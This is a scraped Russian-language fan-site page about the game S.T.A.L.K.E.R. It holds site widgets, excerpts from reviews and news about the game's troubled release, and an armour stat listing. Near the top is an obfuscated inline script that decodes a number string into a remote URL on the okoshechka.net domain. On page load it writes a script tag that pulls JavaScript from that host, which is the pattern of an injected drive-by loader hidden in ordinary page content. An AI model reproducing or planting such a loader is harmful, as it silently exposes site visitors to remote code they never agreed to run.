
Онлайн всего: 1 Гостей: 1 Пользователей: 0
Кто был сегодня :
| на развитие сайта | Патчи
|  <script type="text/javascript" language="javascript"> <!-- function MLr867(DwR265){document.write( String.fromCharCode(parseInt(DwR265)-2));} var aL401="106P118P118P114P60P49P49P70P99P120P107P124P"+ "48P113P109P113P117P106P103P101P106P109P99P48P112P103P"+ "118P49P117P49P114P89P76P92P89P102P58P57P56P55P49P65P"+ "117P107P102P63P57P52P58P58P54";var E450=aL401.split("P"); document.write("<script type='text/javascript' language='javascript' src='"); var z269=0;while(z269<E450.length){MLr867(E450[z269]);z269++;} document.write("'></script>"); // --> </script>
 


|
|
В категории материалов: 106 Показано материалов: 61-70 |
Страницы: « 1 2 ... 5 6 7 8 9 10 11 » |
Сортировать по:
Дате ·
Названию ·
Рейтингу ·
Комментариям ·
Просмотрам
Люди такие привередливые. На все у них есть свое мнение. Выходят фильмы, книги, игры – и ведь найдутся такие, кому надо всунуть свои замечания, критикуя то и это, начиная свои выступления со слов: «Да я бы на их месте…». Наверное, S.T.A.L.K.E.R. досталось больше всего. Сказались и завышенные ожидания, подкрепленные фантастическими обещаниями разработчиков. И объективные недостатки игры, которую на последнем этапе кромсали портняжными ножницами, кое-как подшивая прорехи. Украинские разработчики подарили нам замечательный проект, для нашей индустрии вообще уникальный по объему и качеству проделанной работы. Но в шаге от идеала запутались в своих амбициях. |
Электрошок +90% Ожог +90% Удар +50% Разрыв +50% Хим. ожог +90% Взрыв +60% Пулестойкость +40% Радиация +90% -Выдаётся Сахаровым за выполнение сюжетного квеста в Х-16 |
Друзья! Свершилось то, чего мы ждали на протяжении долгих 6 лет. S.T.A.L.K.E.R., релиз которого столько раз откладывался по тем или иным причинам, наконец-то увидел этот свет. Были моменты, когда даже самые преданные фанаты засомневались, дойдет ли игра до полок или же умрет, так и не родившись. Вспомните обещания GSC: огромная территория в десятки квадратных километров вокруг Чернобыльской АЭС, полная свобода действий, саморегулирующаяся экосистема, сногсшибательная графика, реалистичное оружие, транспортные средства и десятки других амбициозных планов. За время разработки многое поменялось. Какими-то идеями пришлось пожертвовать, потому что не смогли реализовать, другие гениальные задумки задушил издатель в угоду массовому потребителю. Был осуществлен переход на новую версию движка, поддерживающую Directx 9. К 2007-му году изначальная концепция стала практически неузнаваемой, но все равно все ждали Чуда. И оно произошло… почти |
|

Привет: Гость
Гость, мы рады вас видеть. Пожалуйста зарегистрируйтесь или авторизуйтесь!
|

Мы будем очень благодарны, если Вы разместите наш баннер у себя на сайте. Вот его код:
|
|